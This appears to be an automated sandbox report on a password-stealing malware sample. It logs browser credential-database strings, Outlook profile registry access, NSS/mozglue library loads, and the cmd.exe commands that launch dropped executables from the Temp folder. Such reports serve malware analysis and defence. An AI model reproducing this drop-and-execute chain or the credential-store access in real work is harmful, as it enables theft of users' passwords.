Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000003.1729775800.0000000022E14000.00000004.00000020.00020000.00000000.sdmp, CGIJKJJKEBGHJKFIDGCA.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1870480409.000000001CE9A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1882687782.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1870480409.000000001CE9A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1882687782.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe ReversingLabs: Detection: 44%
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Virustotal: Detection: 44%
Source: BGIIDAEBGC.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe File read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\ECGHCBGCBF.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe "C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe"
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe "C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\ECGHCBGCBF.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe "C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe "C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: duser.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.ui.immersive.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: bcp47mrm.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: uianimation.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dxgi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: d3d11.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: d3d10warp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dxcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dcomp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BGIIDAEBGC.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\a37ec701f3.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Static file information: File size 2453504 > 1048576
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Static PE information: Raw size of .data is bigger than: 0x100000 < 0x213c00
Source: Binary string: mozglue.pdbP source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1883425451.000000006C6FF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1883425451.000000006C6FF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
